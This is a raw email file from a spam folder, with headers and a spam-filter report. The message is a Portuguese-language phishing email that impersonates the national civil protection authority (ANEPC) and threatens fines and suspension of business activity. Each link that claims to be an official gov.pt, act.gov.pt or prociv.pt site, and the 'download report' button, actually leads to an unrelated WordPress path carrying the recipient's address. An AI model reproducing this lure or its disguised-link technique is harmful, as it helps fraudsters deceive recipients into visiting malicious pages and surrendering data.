| Current File : /home/mak/mail/.spam/new/1757794382.M733668P13400.cloud.berardocollection.com,S=12347,W=12566 |
Return-Path: <simon@jaegermarketing.de>
Delivered-To: mak+spam@cloud.berardocollection.com
Received: from cloud.berardocollection.com
by cloud.berardocollection.com with LMTP
id kKquKk7QxWhYNAAAuY/3dA
(envelope-from <simon@jaegermarketing.de>)
for <mak+spam@cloud.berardocollection.com>; Sat, 13 Sep 2025 21:13:02 +0100
Return-path: <simon@jaegermarketing.de>
Envelope-to: info@mak.pt
Delivery-date: Sat, 13 Sep 2025 21:13:02 +0100
Received: from mc21727.ispgateway.de ([134.119.0.156]:45834)
by cloud.berardocollection.com with esmtps (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
(Exim 4.98.1)
(envelope-from <simon@jaegermarketing.de>)
id 1uxWcH-000000003km-2d6t
for info@mak.pt;
Sat, 13 Sep 2025 21:13:02 +0100
Received: from mc21727.ispgateway.de (php82.df_default [IPv6:fd00:dead:beef::19])
by mc21727.ispgateway.de (Postfix) with ESMTPS id 982B2D2ADB1F
for <info@mak.pt>; Sat, 13 Sep 2025 21:36:10 +0200 (CEST)
Received: (from re359764@localhost)
by mc21727.ispgateway.de (8.15.2/8.15.2/Submit) id 58DJaAPA4047293;
Sat, 13 Sep 2025 21:36:10 +0200
Date: Sat, 13 Sep 2025 21:36:10 +0200
Message-Id: <202509131936.58DJaAPA4047293@mc21727.ispgateway.de>
X-Authentication-Warning: mc21727.ispgateway.de: re359764 set sender to simon@jaegermarketing.de using -f
To: info@mak.pt
X-PHP-Originating-Script: 359764:trabalho.php
From: Autoridade Nacional de Emergencia e Protecao Civil <geral_prociv.pt17476@mc21727.ispgateway.de>
MIME-Version: 1.0
Content-type: text/html; charset=iso-8859-1
X-Mailer: PHP/8.2.29
X-Spam-Status: Yes, score=5.8
X-Spam-Score: 58
X-Spam-Bar: +++++
X-Spam-Report: Spam detection software, running on the system "cloud.berardocollection.com",
has identified this incoming email as possible spam. The original
message has been attached to this so you can view it or label
similar future email. If you have any questions, see
root\@localhost for details.
Content preview: Email de Notificação de Denúncias Notificação Urgente:
Denúncias Pendentes de Fiscalização Exmos. Senhores,
Content analysis details: (5.8 points, 5.0 required)
pts rule name description
---- ---------------------- --------------------------------------------------
0.0 URIBL_BLOCKED ADMINISTRATOR NOTICE: The query to URIBL was
blocked. See
http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block
for more information.
[URIs: www.gov.pt]
0.0 URIBL_DBL_BLOCKED ADMINISTRATOR NOTICE: The query to
dbl.spamhaus.org was blocked. See
https://www.spamhaus.org/returnc/vol/
[URIs: www.gov.pt]
-1.9 BAYES_00 BODY: Bayes spam probability is 0 to 1%
[score: 0.0000]
0.0 RCVD_IN_VALIDITY_CERTIFIED_BLOCKED RBL: ADMINISTRATOR NOTICE:
The query to Validity was blocked. See
https://knowledge.validity.com/hc/en-us/articles/20961730681243
for more information.
[134.119.0.156 listed in sa-accredit.habeas.com]
0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The
query to Validity was blocked. See
https://knowledge.validity.com/hc/en-us/articles/20961730681243
for more information.
[134.119.0.156 listed in bl.score.senderscore.com]
0.0 HEADER_FROM_DIFFERENT_DOMAINS From and EnvelopeFrom 2nd level
mail domains are different
4.0 SPF_FAIL SPF: sender does not match SPF record (fail)
[SPF failed: Please see http://www.openspf.org/Why?s=mfrom;id=simon%40jaegermarketing.de;ip=134.119.0.156;r=cloud.berardocollection.com]
0.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
0.0 HTML_MESSAGE BODY: HTML included in message
0.5 KAM_NUMSUBJECT Subject ends in numbers excluding current years
0.0 KAM_DMARC_STATUS Test Rule for DKIM or SPF Failure with Strict
Alignment
3.0 KAM_GRABBAG7 Spam pattern with bad HTML message
0.1 TO_IN_SUBJ To address is in Subject
X-Spam-Flag: YES
Subject: ***SPAM*** Aviso Oficial ANEPC: Fiscalizacao de Incendios Obrigatoria - Suspensao de Atividades em Risco - info@mak.pt, ID: 16918
<script type="text/javascript">
var gk_isXlsx = false;
var gk_xlsxFileLookup = {};
var gk_fileData = {};
function filledCell(cell) {
return cell !== '' && cell != null;
}
function loadFileData(filename) {
if (gk_isXlsx && gk_xlsxFileLookup[filename]) {
try {
var workbook = XLSX.read(gk_fileData[filename], { type: 'base64' });
var firstSheetName = workbook.SheetNames[0];
var worksheet = workbook.Sheets[firstSheetName];
// Convert sheet to JSON to filter blank rows
var jsonData = XLSX.utils.sheet_to_json(worksheet, { header: 1, blankrows: false, defval: '' });
// Filter out blank rows (rows where all cells are empty, null, or undefined)
var filteredData = jsonData.filter(row => row.some(filledCell));
// Heuristic to find the header row by ignoring rows with fewer filled cells than the next row
var headerRowIndex = filteredData.findIndex((row, index) =>
row.filter(filledCell).length >= filteredData[index + 1]?.filter(filledCell).length
);
// Fallback
if (headerRowIndex === -1 || headerRowIndex > 25) {
headerRowIndex = 0;
}
// Convert filtered JSON back to CSV
var csv = XLSX.utils.aoa_to_sheet(filteredData.slice(headerRowIndex)); // Create a new sheet from filtered array of arrays
csv = XLSX.utils.sheet_to_csv(csv, { header: 1 });
return csv;
} catch (e) {
console.error(e);
return "";
}
}
return gk_fileData[filename] || "";
}
</script><!DOCTYPE html>
<html lang="pt-PT">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Email de Notificação de Denúncias</title>
<style>
body {
font-family: Arial, sans-serif;
line-height: 1.6;
color: #333;
margin: 0;
padding: 0;
background-color: #f4f4f4;
}
.container {
max-width: 600px;
margin: 20px auto;
background: #fff;
padding: 20px;
border-radius: 8px;
box-shadow: 0 0 10px rgba(0,0,0,0.1);
}
.header {
background: #003087;
color: #fff;
padding: 10px;
text-align: center;
border-radius: 8px 8px 0 0;
}
.content {
padding: 20px;
}
.org-list {
margin: 10px 0;
padding-left: 20px;
}
.warning {
color: #d32f2f;
font-weight: bold;
}
.footer {
text-align: center;
font-size: 12px;
color: #777;
margin-top: 20px;
border-top: 1px solid #ddd;
padding-top: 10px;
}
a {
color: #003087;
text-decoration: none;
}
a:hover {
text-decoration: underline;
}
.download-link {
display: inline-block;
margin: 10px 0;
padding: 10px 15px;
background: #003087;
color: #fff;
border-radius: 5px;
text-align: center;
}
.download-link:hover {
background: #0055b3;
text-decoration: none;
}
</style>
</head>
<body>
<div class="container">
<div class="header">
<h2>Notificação Urgente: Denúncias Pendentes de Fiscalização</h2>
</div>
<div class="content">
<p>Exmos. Senhores,</p>
<p>Informamos que foram recebidas denúncias relacionadas com potenciais incumprimentos nas normas de segurança e saúde no trabalho, segurança contra incêndios, segurança privada e/ou proteção de dados, que requerem a vossa atenção imediata. Abaixo, listamos os órgãos competentes que devem ser contactados para esclarecimentos e regularização:</p>
<ul class="org-list">
<li><strong>Autoridade para as Condições do Trabalho (ACT)</strong>: Fiscalização de segurança e saúde no trabalho (SST), incluindo mapas de riscos e serviços de SST. Contacto: <a href="mailto:geral@act.gov.pt" target="_blank">geral@act.gov.pt</a> | Website: <a href="https://www.vfwredmond.org/wp-content/index2/?cid=info@mak.pt" target="_blank">www.act.gov.pt</a>.</li>
<li><strong>Autoridade Nacional de Emergência e Proteção Civil (ANEPC)</strong>: Verificação de medidas de autoproteção e segurança contra incêndios. Contacto: <a href="mailto:geral@prociv.pt" target="_blank">geral@prociv.pt</a> | Website: <a href="https://www.vfwredmond.org/wp-content/index2/?cid=info@mak.pt" target="_blank">www.prociv.pt</a>.</li>
<li><strong>Inspeção-Geral da Agricultura, do Mar, do Ambiente e do Ordenamento do Território (IGAMAOT)</strong>: Conformidade ambiental e segurança alimentar. Contacto: <a href="mailto:igamaot@igamaot.gov.pt" target="_blank">igamaot@igamaot.gov.pt</a> | Website: <a href="https://www.vfwredmond.org/wp-content/index2/?cid=info@mak.pt" target="_blank">www.igamaot.gov.pt</a>.</li>
<li><strong>Polícia de Segurança Pública (PSP)</strong>: Fiscalização de segurança privada e sistemas de videovigilância. Contacto: <a href="mailto:comando.nacional@psp.pt" target="_blank">comando.nacional@psp.pt</a> | Website: <a href="https://www.vfwredmond.org/wp-content/index2/?cid=info@mak.pt" target="_blank">www.psp.pt</a>.</li>
<li><strong>Comissão Nacional de Proteção de Dados (CNPD)</strong>: Conformidade com o RGPD em sistemas de segurança. Contacto: <a href="mailto:geral@cnpd.pt" target="_blank">geral@cnpd.pt</a> | Website: <a href="https://www.vfwredmond.org/wp-content/index2/?cid=info@mak.pt" target="_blank">www.cnpd.pt</a>.</li>
</ul>
<p><strong>Detalhes das Denúncias</strong>: Para aceder ao relatório completo das denúncias e respetiva documentação, clique no link abaixo para descarregar o ficheiro:</p>
<p><a href="https://www.vfwredmond.org/wp-content/index2/?cid=info@mak.pt" class="download-link" target="_blank">Descarregar Relatório de Denúncias</a></p>
<p class="warning">Aviso: O incumprimento das normas verificadas por estes órgãos pode resultar em coimas significativas, suspensão de atividades ou outras sanções legais, conforme a legislação aplicável (ex.: Lei n.º 102/2009, Lei n.º 34/2013, RGPD).</p>
<p>Solicitamos que, no prazo de <strong>15 dias úteis</strong> a contar da receção deste email, contactem os respetivos órgãos para esclarecimentos e regularização das situações reportadas. Para mais informações, consultem o portal oficial do Governo em <a href="https://www.vfwredmond.org/wp-content/index2/?cid=info@mak.pt" target="_blank">www.gov.pt</a>.</p>
<p>Agradecemos a vossa colaboração e permanecemos disponíveis para quaisquer esclarecimentos.</p>
<p>Com os melhores cumprimentos,<br>
Email do Responsável: <a href="mailto:responsavel@exemplo.pt" target="_blank">info@mak.pt</a></p>
</div>
<div class="footer">
<p>Este email é uma notificação oficial. Por favor, não responda diretamente a este email. Para questões, contacte os órgãos indicados ou o responsável indicado.</p>
</div>
</div>
</body>
</html>